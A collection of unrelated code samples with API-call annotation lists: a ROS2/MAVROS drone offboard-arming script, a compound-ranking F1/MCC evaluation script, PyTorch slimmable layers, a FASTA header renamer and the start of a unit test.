] | [((2270, 2304), 'numpy.multiply', 'np.multiply', (['self._lambda', 'weights'], {}), '(self._lambda, weights)\n', (2281, 2304), True, 'import numpy as np\n'), ((1102, 1125), 'numpy.linalg.norm', 'np.linalg.norm', (['weights'], {}), '(weights)\n', (1116, 1125), True, 'import numpy as np\n'), ((1204, 1220), 'numpy.sign', 'np.sign', (['weights'], {}), '(weights)\n', (1211, 1220), True, 'import numpy as np\n'), ((3253, 3276), 'numpy.linalg.norm', 'np.linalg.norm', (['weights'], {}), '(weights)\n', (3267, 3276), True, 'import numpy as np\n'), ((3418, 3434), 'numpy.sign', 'np.sign', (['weights'], {}), '(weights)\n', (3425, 3434), True, 'import numpy as np\n')] |
#!/usr/bin/env python3
import rclpy
from rclpy.node import Node
from rclpy.callback_groups import ReentrantCallbackGroup
from rclpy.clock import Duration
from rclpy.executors import MultiThreadedExecutor
from geometry_msgs.msg import PoseStamped, Point
from mavros_msgs.srv import CommandBool, SetMode
from mavros_msgs.msg import State
from mavros import Client
class MavrosClient(Client):
    """Thin MAVROS client: caches the latest FCU state and exposes shortcuts
    to the setpoint publisher and arming/set-mode service clients.

    Connects with node name "ex_mavros" under namespace "drone_0/mavros".
    """
    def __init__(self):
        super().__init__("ex_mavros", "drone_0/mavros")
        # Latest vehicle state; refreshed by the subscription below.
        self.current_state = State()
        self.system.subscribe_state(self._cb_state)
        # Shortcuts to publishers/clients provided by the mavros Client
        # base class (presumably created in its __init__ — verify upstream).
        self.pub_setpoint_local = self.setpoint_position.pub_local
        self.cli_arming = self.command.cli_arming
        self.cli_set_mode = self.system.cli_set_mode
    def _cb_state(self, msg: State):
        # State-subscription callback: cache the most recent message.
        self.current_state = msg
def main(args=None):
    """Offboard-control demo: connect to the FCU, stream position setpoints,
    then switch to OFFBOARD mode and arm the vehicle.

    Args:
        args: forwarded to rclpy.init (command-line args or None).
    """
    rclpy.init(args=args)
    ex = MavrosClient()
    executor = MultiThreadedExecutor()
    # Setpoint publishing rate must be faster than 2 Hz for PX4 OFFBOARD.
    rate = ex.create_rate(20.0)  # FIXME: rate locks up ros when sleep is called

    # Wait for the MAVROS <-> FCU connection.
    while rclpy.ok() and not ex.current_state.connected:
        rclpy.spin_once(ex)
        ex.get_logger().info("Trying to connect", throttle_duration_sec=2.0)
    ex.get_logger().info("Connected!")

    pose = PoseStamped()
    pose.pose.position = Point(x=0.0, y=0.0, z=2.0)

    # Stream some setpoints before requesting OFFBOARD; PX4 rejects the
    # mode switch unless setpoints are already arriving.
    i = 100
    while rclpy.ok() and i > 0:
        ex.pub_setpoint_local.publish(pose)
        rclpy.spin_once(ex)
        ex.get_logger().info("Sending initial setpoints", throttle_duration_sec=2.0)
        i -= 1

    offb_set_mode = SetMode.Request()
    offb_set_mode.custom_mode = "OFFBOARD"  # px4_cmode_map in uas_stringify.cpp
    arm_cmd = CommandBool.Request()
    arm_cmd.value = True

    last_request = ex.get_clock().now()
    while rclpy.ok():
        # Retry mode switch / arming at most every 5 seconds.
        if ex.current_state.mode != "OFFBOARD" and ex.get_clock().now() - last_request > Duration(seconds=5.0):
            ex.get_logger().info("Sending offboard mode")
            res = ex.cli_set_mode.call(offb_set_mode)
            ex.get_logger().info("sent offboard")
            if res.mode_sent:
                ex.get_logger().info("Offboard enabled")
            last_request = ex.get_clock().now()
        else:
            if not ex.current_state.armed and ex.get_clock().now() - last_request > Duration(seconds=5.0):
                ex.get_logger().info("Sending arm")
                # BUG fix: rclpy's Client.call() returns the service
                # *response*; the Request object has no `.response`
                # attribute (that is ROS1 C++ style), so the original
                # `arm_cmd.response.success` raised AttributeError.
                res = ex.cli_arming.call(arm_cmd)
                if res is not None and res.success:
                    ex.get_logger().info("Vehicle armed")
                last_request = ex.get_clock().now()
        ex.pub_setpoint_local.publish(pose)
        rclpy.spin_once(ex, executor=executor)
        ex.get_logger().info("Publishing setpoint", throttle_duration_sec=2.0)


if __name__ == "__main__":
    main()
| [
"rclpy.ok",
"rclpy.executors.MultiThreadedExecutor",
"mavros_msgs.msg.State",
"mavros_msgs.srv.CommandBool.Request",
"rclpy.clock.Duration",
"mavros_msgs.srv.SetMode.Request",
"geometry_msgs.msg.Point",
"geometry_msgs.msg.PoseStamped",
"rclpy.spin_once",
"rclpy.init"
] | [((833, 854), 'rclpy.init', 'rclpy.init', ([], {'args': 'args'}), '(args=args)\n', (843, 854), False, 'import rclpy\n'), ((894, 917), 'rclpy.executors.MultiThreadedExecutor', 'MultiThreadedExecutor', ([], {}), '()\n', (915, 917), False, 'from rclpy.executors import MultiThreadedExecutor\n'), ((1317, 1330), 'geometry_msgs.msg.PoseStamped', 'PoseStamped', ([], {}), '()\n', (1328, 1330), False, 'from geometry_msgs.msg import PoseStamped, Point\n'), ((1356, 1382), 'geometry_msgs.msg.Point', 'Point', ([], {'x': '(0.0)', 'y': '(0.0)', 'z': '(2.0)'}), '(x=0.0, y=0.0, z=2.0)\n', (1361, 1382), False, 'from geometry_msgs.msg import PoseStamped, Point\n'), ((1685, 1702), 'mavros_msgs.srv.SetMode.Request', 'SetMode.Request', ([], {}), '()\n', (1700, 1702), False, 'from mavros_msgs.srv import CommandBool, SetMode\n'), ((1798, 1819), 'mavros_msgs.srv.CommandBool.Request', 'CommandBool.Request', ([], {}), '()\n', (1817, 1819), False, 'from mavros_msgs.srv import CommandBool, SetMode\n'), ((1895, 1905), 'rclpy.ok', 'rclpy.ok', ([], {}), '()\n', (1903, 1905), False, 'import rclpy\n'), ((505, 512), 'mavros_msgs.msg.State', 'State', ([], {}), '()\n', (510, 512), False, 'from mavros_msgs.msg import State\n'), ((1092, 1102), 'rclpy.ok', 'rclpy.ok', ([], {}), '()\n', (1100, 1102), False, 'import rclpy\n'), ((1147, 1166), 'rclpy.spin_once', 'rclpy.spin_once', (['ex'], {}), '(ex)\n', (1162, 1166), False, 'import rclpy\n'), ((1448, 1458), 'rclpy.ok', 'rclpy.ok', ([], {}), '()\n', (1456, 1458), False, 'import rclpy\n'), ((1522, 1541), 'rclpy.spin_once', 'rclpy.spin_once', (['ex'], {}), '(ex)\n', (1537, 1541), False, 'import rclpy\n'), ((2807, 2845), 'rclpy.spin_once', 'rclpy.spin_once', (['ex'], {'executor': 'executor'}), '(ex, executor=executor)\n', (2822, 2845), False, 'import rclpy\n'), ((1996, 2017), 'rclpy.clock.Duration', 'Duration', ([], {'seconds': '(5.0)'}), '(seconds=5.0)\n', (2004, 2017), False, 'from rclpy.clock import Duration\n'), ((2493, 2514), 'rclpy.clock.Duration', 
'Duration', ([], {'seconds': '(5.0)'}), '(seconds=5.0)\n', (2501, 2514), False, 'from rclpy.clock import Duration\n')] |
#!/home/ssericksen/anaconda2/bin/python2.7
# evaluate F1 and MCC metrics on new targets. Assume 10% hit fractions,
# and predict top 10% of cpds by score as the actives
import numpy as np
import pandas as pd
import informer_functions as inf
import sklearn as sk
import sys

try:
    matrix = sys.argv[1]  # 1 or 2
    targ = sys.argv[2]   # pknb, bglf4, or rop18
except:
    print('')
    print(' eval_rocauc_newtarg.py matrix targ')
    print('')
    print(' 1 or 2 pknb, bglf4, or rop18')
    print('')
    # BUG fix: the bare name `exit` was never called, so the script fell
    # through and crashed later on undefined `matrix`/`targ`. Terminate
    # explicitly with a non-zero status.
    sys.exit(1)

rankings_file = '../output_newtargs/pkis'+matrix+'_'+targ+'_model_rankings_v1.2.csv'
activity_matrix_file = '../data/data_newtargs_pkis'+matrix+'cpds.csv'

df_continuous = pd.read_csv( activity_matrix_file, index_col='molid')
df_binary = inf.get_binary( df_continuous )
df_binary.index = df_binary.index.map(str)
df_rankings = pd.read_csv( rankings_file, index_col='molid' )
df_rankings.index = df_rankings.index.map(str)
# Informer compounds carry the sentinel score -1000.0 so they always
# rank ahead of every scored compound.
df_rankings.replace('informer', -1000.0, inplace=True)

print('model,inf_hits,hits_recovered,tot_hits,F1,MCC')

for model in df_rankings.columns:
    if df_rankings[model].count() < 300:
        # Too few scored compounds: report informer/total hits only, with
        # NaN metrics.
        print("model:{} and target:{} missing significant portion of scored cpds, skipping metric eval".format(model,targ))
        s_labels = df_binary[targ].rename('labels')
        s_rankings = df_rankings[model].astype(float).rename('scores')
        df_temp = pd.concat( [s_labels, s_rankings], axis=1, sort=False )
        inf_hits = df_temp[ df_temp['scores'] == -1000.0 ]['labels'].sum()
        tot_hits = df_temp['labels'].sum()
        hits_recovered = np.nan
        f1 = np.nan
        mcc = np.nan
    else:
        s_labels = df_binary[targ].rename('labels')
        s_rankings = df_rankings[model].astype(float).rename('scores')
        df_temp = pd.concat( [s_labels, s_rankings], axis=1, sort=False )
        # do not count negative informers as false positives
        df_temp = df_temp[ ~((df_temp['scores'] == -1000.0) & (df_temp['labels'] == False)) ]
        df_temp = df_temp.dropna( how='any')
        # predict the top 10% ranking cpds as "active"
        df_temp['binary_predictions'] = df_temp['scores'] <= df_temp['scores'].quantile(0.10)
        predictions_arr = df_temp['binary_predictions'].values
        labels_arr = df_temp['labels'].values
        tot_hits = labels_arr.sum()
        inf_hits = df_temp[ df_temp['scores'] == -1000.0 ]['labels'].sum()
        f1 = sk.metrics.f1_score( labels_arr, predictions_arr )
        mcc = sk.metrics.matthews_corrcoef( labels_arr, predictions_arr )
        # so with truncated dataset (with negative informers removed), how many cpds in 10% of dataset?
        N = int( round( len(df_temp) * 0.10 ) )
        hits_recovered = df_temp.sort_values('scores').head( N )['labels'].sum()
    # BUG fix: the original `print('...').format(...)` called .format() on
    # print()'s return value (None under Python 3); format before printing.
    # This form is behavior-identical under the Python 2 print statement too.
    print('{},{},{},{},{},{}'.format( model, inf_hits, hits_recovered, tot_hits, f1, mcc ))
| [
"sklearn.metrics.f1_score",
"pandas.read_csv",
"pandas.concat",
"informer_functions.get_binary",
"sklearn.metrics.matthews_corrcoef"
] | [((717, 769), 'pandas.read_csv', 'pd.read_csv', (['activity_matrix_file'], {'index_col': '"""molid"""'}), "(activity_matrix_file, index_col='molid')\n", (728, 769), True, 'import pandas as pd\n'), ((783, 812), 'informer_functions.get_binary', 'inf.get_binary', (['df_continuous'], {}), '(df_continuous)\n', (797, 812), True, 'import informer_functions as inf\n'), ((873, 918), 'pandas.read_csv', 'pd.read_csv', (['rankings_file'], {'index_col': '"""molid"""'}), "(rankings_file, index_col='molid')\n", (884, 918), True, 'import pandas as pd\n'), ((1419, 1472), 'pandas.concat', 'pd.concat', (['[s_labels, s_rankings]'], {'axis': '(1)', 'sort': '(False)'}), '([s_labels, s_rankings], axis=1, sort=False)\n', (1428, 1472), True, 'import pandas as pd\n'), ((1818, 1871), 'pandas.concat', 'pd.concat', (['[s_labels, s_rankings]'], {'axis': '(1)', 'sort': '(False)'}), '([s_labels, s_rankings], axis=1, sort=False)\n', (1827, 1871), True, 'import pandas as pd\n'), ((2456, 2504), 'sklearn.metrics.f1_score', 'sk.metrics.f1_score', (['labels_arr', 'predictions_arr'], {}), '(labels_arr, predictions_arr)\n', (2475, 2504), True, 'import sklearn as sk\n'), ((2521, 2578), 'sklearn.metrics.matthews_corrcoef', 'sk.metrics.matthews_corrcoef', (['labels_arr', 'predictions_arr'], {}), '(labels_arr, predictions_arr)\n', (2549, 2578), True, 'import sklearn as sk\n')] |
"""
Ref: https://github.com/htwang14/CAT/blob/1152f7095d6ea0026c7344b00fefb9f4990444f2/models/FiLM.py#L35
"""
import numpy as np
import torch.nn as nn
from torch.nn import functional as F
from torch.nn.modules.batchnorm import _BatchNorm
class SwitchableLayer1D(nn.Module):
    """1-dimensional switchable layer.

    Holds one instance of ``module_class`` per slim ratio and routes the
    forward pass through the instance matching the current ratio. "1D"
    means the wrapped module only needs a single size argument
    (``num_features``), like BatchNorm.

    Args:
        module_class (nn.Module): module class taking `num_features`
            as the first arg, plus arbitrary kwargs.
        max_num_features (int): feature count at slim ratio 1.0.
        slim_ratios (list): the supported width ratios.
    """

    def __init__(self, module_class, max_num_features: int, slim_ratios: list, **kwargs):
        super(SwitchableLayer1D, self).__init__()
        self.max_num_features = max_num_features
        slim_ratios = sorted(slim_ratios)
        # One sub-module per ratio, each sized to ceil(ratio * max width).
        widths = [int(np.ceil(ratio * max_num_features)) for ratio in slim_ratios]
        self._switch_modules = nn.ModuleList(
            [module_class(width, **kwargs) for width in widths])
        # -1 selects the widest module (ratios are sorted ascending).
        self.current_module_idx = -1
        self._slim_ratio = max(slim_ratios)
        self.slim_ratios = slim_ratios
        self.ignore_model_profiling = True

    @property
    def slim_ratio(self):
        return self._slim_ratio

    @slim_ratio.setter
    def slim_ratio(self, r):
        # Switch to the sub-module built for ratio `r`.
        self.current_module_idx = self.slim_ratios.index(r)
        self._slim_ratio = r

    def forward(self, x):
        return self._switch_modules[self.current_module_idx](x)
class SlimmableOpMixin(object):
    """Shared helpers for slimmable ops: mixed forward over weight shifts and
    slice-bound computation for selecting a channel window of the full weight.
    """
    def mix_forward(self, x, mix_num=-1):
        # Average the outputs of `mix_num` shifted partial-weight forwards.
        # mix_num < 0 means "use all non-overlapping windows", i.e. 1/ratio.
        if mix_num < 0:
            mix_num = int(1/self.slim_ratio)
        elif mix_num == 0:
            print("WARNING: not mix anything.")
        out = 0.
        for shift_idx in range(0, mix_num):
            out = out + self._forward_with_partial_weight(x, shift_idx)
        return out * 1. / mix_num
    def _forward_with_partial_weight(self, x, slim_bias_idx, out_slim_bias_idx=None):
        # Must be provided by the concrete op (Conv2d / Linear / BN variants).
        raise NotImplementedError()
    def _compute_slice_bound(self, in_channels, out_channels, slim_bias_idx, out_slim_bias_idx=None):
        # Returns (out_start, out_end, in_start, in_end) for slicing the full
        # weight; a `non_slimmable_*` flag pins the corresponding start at 0.
        out_slim_bias_idx = slim_bias_idx if out_slim_bias_idx is None else out_slim_bias_idx
        out_idx_bias = out_channels * out_slim_bias_idx if not self.non_slimmable_out else 0
        in_idx_bias = in_channels * slim_bias_idx if not self.non_slimmable_in else 0
        return out_idx_bias, (out_idx_bias+out_channels), in_idx_bias, (in_idx_bias+in_channels)
class _SlimmableBatchNorm(_BatchNorm, SlimmableOpMixin):
    """
    BatchNorm2d shared by all sub-networks in slimmable network.
    This won't work according to slimmable net paper.
    See implementation in https://github.com/htwang14/CAT/blob/1152f7095d6ea0026c7344b00fefb9f4990444f2/models/slimmable_ops.py#L28
    If this is used, we will enforce the tracking to be disabled.
    Following https://github.com/dem123456789/HeteroFL-Computation-and-Communication-Efficient-Federated-Learning-for-Heterogeneous-Clients
    """
    def __init__(self, num_features, eps=1e-5, momentum=None, affine=True,
                 track_running_stats=False, non_slimmable=False):
        # Running-stat tracking is forbidden: the tracked buffers have a
        # fixed size and cannot follow a changing slim width.
        assert not track_running_stats, "You should not track stats which cannot be slimmable."
        # if track_running_stats:
        #     assert non_slimmable
        super(_SlimmableBatchNorm, self).__init__(num_features, momentum=momentum, track_running_stats=False, affine=affine, eps=eps)
        self.max_num_features = num_features
        self._slim_ratio = 1.0
        # Which window of the full weight/bias vectors to use.
        self.slim_bias_idx = 0
        self.out_slim_bias_idx = None
        self.non_slimmable = non_slimmable
        self.mix_forward_num = 1  # 1 means not mix; -1 mix all
    @property
    def slim_ratio(self):
        return self._slim_ratio
    @slim_ratio.setter
    def slim_ratio(self, r):
        # Shrink/grow the active feature count to match the new ratio.
        self.num_features = self._compute_channels(r)
        self._slim_ratio = r
        if r < 0 and self.track_running_stats:
            raise RuntimeError(f"Try to track state when slim_ratio < 1 is {r}")
    def _compute_channels(self, ratio):
        # Non-slimmable layers always keep the full width.
        return self.max_num_features if self.non_slimmable \
            else int(np.ceil(self.max_num_features * ratio))
    def forward(self, x):
        if self.mix_forward_num == 1:
            return self._forward_with_partial_weight(x, self.slim_bias_idx, self.out_slim_bias_idx)
        else:
            return self.mix_forward(x, mix_num=self.mix_forward_num)
    def _forward_with_partial_weight(self, input, slim_bias_idx, out_slim_bias_idx=None):
        # Slice the affine parameters down to the active window, then run
        # the standard BatchNorm forward with the sliced weight/bias.
        out_idx0, out_idx1 = self._compute_slice_bound(self.num_features, slim_bias_idx)
        weight = self.weight[out_idx0:out_idx1]
        bias = self.bias[out_idx0:out_idx1]
        # ----- copy from parent implementation ----
        self._check_input_dim(input)
        # exponential_average_factor is set to self.momentum
        # (when it is available) only so that it gets updated
        # in ONNX graph when this node is exported to ONNX.
        if self.momentum is None:
            exponential_average_factor = 0.0
        else:
            exponential_average_factor = self.momentum
        if self.training and self.track_running_stats:
            # TODO: if statement only here to tell the jit to skip emitting this when it is None
            if self.num_batches_tracked is not None:
                self.num_batches_tracked = self.num_batches_tracked + 1
                if self.momentum is None:  # use cumulative moving average
                    exponential_average_factor = 1.0 / float(self.num_batches_tracked)
                else:  # use exponential moving average
                    exponential_average_factor = self.momentum
        r"""
        Decide whether the mini-batch stats should be used for normalization rather than the buffers.
        Mini-batch stats are used in training mode, and in eval mode when buffers are None.
        """
        if self.training:
            bn_training = True
        else:
            bn_training = (self.running_mean is None) and (self.running_var is None)
        r"""
        Buffers are only updated if they are to be tracked and we are in training mode. Thus they only need to be
        passed when the update should occur (i.e. in training mode when they are tracked), or when buffer stats are
        used for normalization (i.e. in eval mode when buffers are not None).
        """
        return F.batch_norm(
            input,
            # If buffers are not to be tracked, ensure that they won't be updated
            self.running_mean if not self.training or self.track_running_stats else None,
            self.running_var if not self.training or self.track_running_stats else None,
            weight, bias, bn_training, exponential_average_factor, self.eps)
    def _compute_slice_bound(self, channels, slim_bias_idx):
        # BN has a single feature dimension, so this overrides the mixin's
        # (in, out) version with a single-window variant.
        idx_bias = channels * slim_bias_idx if not self.non_slimmable else 0
        return idx_bias, (idx_bias+channels)
    def _save_to_state_dict(self, destination, prefix, keep_vars):
        # Save only the currently-active slice of weight/bias so the state
        # dict matches the slimmed shape.
        for name, param in self._parameters.items():
            if param is not None:
                # ------------------------------
                idx_bias = self.num_features * self.slim_bias_idx if not self.non_slimmable else 0
                if name == 'weight':
                    param = param[idx_bias:(idx_bias + self.num_features)]
                elif name == 'bias' and param is not None:
                    param = param[idx_bias:(idx_bias + self.num_features)]
                # ------------------------------
                destination[prefix + name] = param if keep_vars else param.detach()
        for name, buf in self._buffers.items():
            if buf is not None and name not in self._non_persistent_buffers_set:
                destination[prefix + name] = buf if keep_vars else buf.detach()
class SlimmableBatchNorm2d(_SlimmableBatchNorm):
    """Slimmable batch norm over 4-D (N, C, H, W) inputs."""

    def _check_input_dim(self, input):
        ndim = input.dim()
        if ndim != 4:
            raise ValueError('expected 4D input (got {}D input)'.format(ndim))
class SlimmableBatchNorm1d(_SlimmableBatchNorm):
    """Slimmable batch norm over 2-D (N, C) or 3-D (N, C, L) inputs."""

    def _check_input_dim(self, input):
        ndim = input.dim()
        if ndim not in (2, 3):
            raise ValueError('expected 2D or 3D input (got {}D input)'.format(ndim))
class SlimmableConv2d(nn.Conv2d, SlimmableOpMixin):
    """Conv2d whose active in/out channel counts follow `slim_ratio`.

    The full-width weight is allocated once; a window of it is sliced out
    per forward pass according to the current ratio and bias indices.

    Args:
        non_slimmable_in: Fix the in size
        non_slimmable_out: Fix the out size
    """
    def __init__(self, in_channels: int, out_channels: int,
                 kernel_size, stride=1, padding=0, dilation=1,
                 groups=1, bias=True,
                 non_slimmable_out=False, non_slimmable_in=False,):
        super(SlimmableConv2d, self).__init__(
            in_channels, out_channels,
            kernel_size, stride=stride, padding=padding, dilation=dilation,
            groups=groups, bias=bias)
        assert groups == 1, "for now, we can only support single group when slimming."
        assert in_channels > 0
        assert out_channels > 0
        self.max_in_channels = in_channels
        self.max_out_channels = out_channels
        self._slim_ratio = 1.0
        self.slim_bias_idx = 0  # input slim bias idx
        self.out_slim_bias_idx = None  # -1: use the same value as slim_bias_idx
        self.non_slimmable_out = non_slimmable_out
        self.non_slimmable_in = non_slimmable_in
        # -1: average over all weight windows (see SlimmableOpMixin.mix_forward).
        self.mix_forward_num = -1
    @property
    def slim_ratio(self):
        return self._slim_ratio
    @slim_ratio.setter
    def slim_ratio(self, r):
        # Recompute the active channel counts for the new ratio.
        self.in_channels, self.out_channels = self._compute_channels(r)
        self._slim_ratio = r
    def _compute_channels(self, ratio):
        # A non_slimmable_* flag pins that dimension at its maximum width.
        in_channels = self.max_in_channels if self.non_slimmable_in \
            else int(np.ceil(self.max_in_channels * ratio))
        out_channels = self.max_out_channels if self.non_slimmable_out \
            else int(np.ceil(self.max_out_channels * ratio))
        return in_channels, out_channels
    def forward(self, x):
        if self.mix_forward_num == 1:
            return self._forward_with_partial_weight(x, self.slim_bias_idx, self.out_slim_bias_idx)
        else:
            return self.mix_forward(x, mix_num=self.mix_forward_num)
    def _forward_with_partial_weight(self, x, slim_bias_idx, out_slim_bias_idx=None):
        # Slice the active weight/bias window, then run a normal conv.
        out_idx0, out_idx1, in_idx0, in_idx1 = self._compute_slice_bound(
            self.in_channels, self.out_channels, slim_bias_idx, out_slim_bias_idx)
        weight = self.weight[out_idx0:out_idx1, in_idx0:in_idx1]
        bias = self.bias[out_idx0:out_idx1] if self.bias is not None else None
        y = F.conv2d(
            x, weight, bias, self.stride, self.padding,
            self.dilation, self.groups)
        # Rescale during training to compensate for the reduced width.
        return y / self.slim_ratio if self.training and not self.non_slimmable_out else y
    def _save_to_state_dict(self, destination, prefix, keep_vars):
        # Save only the currently-active weight/bias window so the state
        # dict matches the slimmed module shape.
        for name, param in self._parameters.items():
            if param is not None:
                # ------------------------------
                out_idx_bias = self.out_channels * self.slim_bias_idx if not self.non_slimmable_out else 0
                if name == 'weight':
                    in_idx_bias = self.in_channels * self.slim_bias_idx \
                        if not self.non_slimmable_in else 0
                    param = param[out_idx_bias:(out_idx_bias+self.out_channels),
                                  in_idx_bias:(in_idx_bias+self.in_channels)]
                elif name == 'bias' and param is not None:
                    param = param[out_idx_bias:(out_idx_bias + self.out_channels)]
                # ------------------------------
                destination[prefix + name] = param if keep_vars else param.detach()
        for name, buf in self._buffers.items():
            if buf is not None and name not in self._non_persistent_buffers_set:
                destination[prefix + name] = buf if keep_vars else buf.detach()
class SlimmableLinear(nn.Linear, SlimmableOpMixin):
    """Linear layer whose active in/out feature counts follow `slim_ratio`.

    Args:
        non_slimmable_in: Fix the in size
        non_slimmable_out: Fix the out size
    """
    def __init__(self, in_features: int, out_features: int, bias=True,
                 non_slimmable_out=False, non_slimmable_in=False,):
        super(SlimmableLinear, self).__init__(in_features, out_features, bias=bias)
        self.max_in_features = in_features
        self.max_out_features = out_features
        self._slim_ratio = 1.0
        self.slim_bias_idx = 0  # input slim bias idx
        self.out_slim_bias_idx = None  # -1: use the same value as slim_bias_idx
        self.non_slimmable_out = non_slimmable_out
        self.non_slimmable_in = non_slimmable_in
        # -1: average over all weight windows (see SlimmableOpMixin.mix_forward).
        self.mix_forward_num = -1
    @property
    def slim_ratio(self):
        return self._slim_ratio
    @slim_ratio.setter
    def slim_ratio(self, r):
        # Recompute the active feature counts for the new ratio.
        self.in_features, self.out_features = self._compute_channels(r)
        self._slim_ratio = r
    def _compute_channels(self, ratio):
        # A non_slimmable_* flag pins that dimension at its maximum width.
        in_features = self.max_in_features if self.non_slimmable_in \
            else int(np.ceil(self.max_in_features * ratio))
        out_features = self.max_out_features if self.non_slimmable_out \
            else int(np.ceil(self.max_out_features * ratio))
        return in_features, out_features
    def forward(self, x):
        if self.mix_forward_num == 1:
            return self._forward_with_partial_weight(x, self.slim_bias_idx, self.out_slim_bias_idx)
        else:
            return self.mix_forward(x, mix_num=self.mix_forward_num)
    def _forward_with_partial_weight(self, x, slim_bias_idx, out_slim_bias_idx=None):
        # Slice the active weight/bias window, then run a normal linear op.
        out_idx0, out_idx1, in_idx0, in_idx1 = self._compute_slice_bound(
            self.in_features, self.out_features, slim_bias_idx, out_slim_bias_idx)
        weight = self.weight[out_idx0:out_idx1, in_idx0:in_idx1]
        bias = self.bias[out_idx0:out_idx1] if self.bias is not None else None
        out = F.linear(x, weight, bias)
        # Rescale during training to compensate for the reduced width.
        return out / self.slim_ratio if self.training and not self.non_slimmable_out else out
    def _save_to_state_dict(self, destination, prefix, keep_vars):
        # Save only the currently-active weight/bias window so the state
        # dict matches the slimmed module shape.
        for name, param in self._parameters.items():
            if param is not None:
                # ------------------------------
                param = self.get_slim_param(name, param)
                # ------------------------------
                destination[prefix + name] = param if keep_vars else param.detach()
        for name, buf in self._buffers.items():
            if buf is not None and name not in self._non_persistent_buffers_set:
                destination[prefix + name] = buf if keep_vars else buf.detach()
    def get_slim_param(self, name, param):
        # Return the slice of `param` covering the active window.
        out_idx_bias = self.out_features * self.slim_bias_idx if not self.non_slimmable_out else 0
        if name == 'weight':
            in_idx_bias = self.in_features * self.slim_bias_idx if not self.non_slimmable_in else 0
            param = param[out_idx_bias:(out_idx_bias + self.out_features),
                          in_idx_bias:(in_idx_bias + self.in_features)]
        elif name == 'bias' and param is not None:
            param = param[out_idx_bias:(out_idx_bias + self.out_features)]
        return param
| [
"torch.nn.functional.linear",
"torch.nn.functional.conv2d",
"numpy.ceil",
"torch.nn.ModuleList",
"torch.nn.functional.batch_norm"
] | [((961, 983), 'torch.nn.ModuleList', 'nn.ModuleList', (['modules'], {}), '(modules)\n', (974, 983), True, 'import torch.nn as nn\n'), ((6404, 6656), 'torch.nn.functional.batch_norm', 'F.batch_norm', (['input', '(self.running_mean if not self.training or self.track_running_stats else None)', '(self.running_var if not self.training or self.track_running_stats else None)', 'weight', 'bias', 'bn_training', 'exponential_average_factor', 'self.eps'], {}), '(input, self.running_mean if not self.training or self.\n track_running_stats else None, self.running_var if not self.training or\n self.track_running_stats else None, weight, bias, bn_training,\n exponential_average_factor, self.eps)\n', (6416, 6656), True, 'from torch.nn import functional as F\n'), ((10709, 10794), 'torch.nn.functional.conv2d', 'F.conv2d', (['x', 'weight', 'bias', 'self.stride', 'self.padding', 'self.dilation', 'self.groups'], {}), '(x, weight, bias, self.stride, self.padding, self.dilation, self.groups\n )\n', (10717, 10794), True, 'from torch.nn import functional as F\n'), ((14032, 14057), 'torch.nn.functional.linear', 'F.linear', (['x', 'weight', 'bias'], {}), '(x, weight, bias)\n', (14040, 14057), True, 'from torch.nn import functional as F\n'), ((845, 874), 'numpy.ceil', 'np.ceil', (['(r * max_num_features)'], {}), '(r * max_num_features)\n', (852, 874), True, 'import numpy as np\n'), ((4137, 4175), 'numpy.ceil', 'np.ceil', (['(self.max_num_features * ratio)'], {}), '(self.max_num_features * ratio)\n', (4144, 4175), True, 'import numpy as np\n'), ((9843, 9880), 'numpy.ceil', 'np.ceil', (['(self.max_in_channels * ratio)'], {}), '(self.max_in_channels * ratio)\n', (9850, 9880), True, 'import numpy as np\n'), ((9980, 10018), 'numpy.ceil', 'np.ceil', (['(self.max_out_channels * ratio)'], {}), '(self.max_out_channels * ratio)\n', (9987, 10018), True, 'import numpy as np\n'), ((13164, 13201), 'numpy.ceil', 'np.ceil', (['(self.max_in_features * ratio)'], {}), '(self.max_in_features * ratio)\n', 
(13171, 13201), True, 'import numpy as np\n'), ((13301, 13339), 'numpy.ceil', 'np.ceil', (['(self.max_out_features * ratio)'], {}), '(self.max_out_features * ratio)\n', (13308, 13339), True, 'import numpy as np\n')] |
"""
renameHeaders.py
Created by <NAME>
Before a hybrid index can be created from hg19_random.fa and
mm10.fa, the headers must be changed so that they are reference-specific.
This is important during the alignment process, as the name of the chromosome to which
each read aligns is included in the SAM format for that read. The only way to
distinguish if the read aligned to i.e. chr1 on mouse or chr1 on human is by the
reference name in the chromosome tag.
"""
import re
import sys
# Tag every FASTA header with the reference name so chromosomes from
# different genomes stay distinguishable after building a hybrid index.
with open(sys.argv[1], 'r') as in_file, \
        open('hg19_random_tagged.fa', 'w') as out_file:
    for line in in_file:
        if not line.strip():
            continue  # drop blank lines, as before
        if line.startswith('>'):
            # BUG fix: re.findall returns a *list*, so the original
            # `chr_name + '_hg19'` raised TypeError on the first header.
            # Also, '>chr[0-9]*' truncated headers such as >chrX, >chrY or
            # >chr1_random down to '>chr'; tag the whole header instead.
            out_file.write("{:s}_hg19\n".format(line.rstrip('\n')))
        else:
            # BUG fix: `line` already ends with a newline; formatting it
            # with an extra '\n' inserted blank lines into the FASTA output.
            out_file.write(line)
| [
"re.findall"
] | [((629, 668), 're.findall', 're.findall', (['""">chr[0-9]*"""', 'line'], {'flags': '(0)'}), "('>chr[0-9]*', line, flags=0)\n", (639, 668), False, 'import re\n')] |
import unittest
from rapidmaps.map.state import MapStateType, MapStateEntity, MapState, MapStateTranslator
from rapidmaps.map.selection import Selections
from rapidmaps.map.shape import Point
import wx
class MyTestCase(unittest.TestCase):
    """Unit tests for rapidmaps map-state types, entities and translators."""

    # NOTE(review): method name has a typo — 'sate' should be 'state'.
    def test_map_sate_type(self):
        # contains() recognises real enum members and rejects arbitrary values.
        self.assertEqual(MapStateType.contains(MapStateType.UNKNOWN), True)
        self.assertEqual(MapStateType.contains('WRONG'), False)
        # get_default() echoes a valid type and falls back to UNKNOWN otherwise.
        self.assertEqual(MapStateType.get_default(MapStateType.MOUSE_LEFT_POS),
                         MapStateType.MOUSE_LEFT_POS)
        self.assertEqual(MapStateType.get_default('WRONG'),
                         MapStateType.UNKNOWN)
    def test_maps_state_entity(self):
        # A freshly built entity exposes its value and has no previous value.
        state = MapStateEntity(MapStateType.UNKNOWN, 2)
        self.assertNotEqual(state, None)
        self.assertEqual(state.value, 2)
        self.assertEqual(state.last_value, None)
        # Assigning .value shifts the old value into .last_value.
        state.value = 4
        self.assertEqual(state.value, 4)
        self.assertEqual(state.last_value, 2)
        # Three-argument form also seeds last_value explicitly.
        state2 = MapStateEntity(MapStateType.MOUSE_LEFT_POS, (100, 100), (0, 0))
        self.assertEqual(state2.type, MapStateType.MOUSE_LEFT_POS)
        self.assertEqual(state2.is_type(MapStateType.MOUSE_LEFT_POS), True)
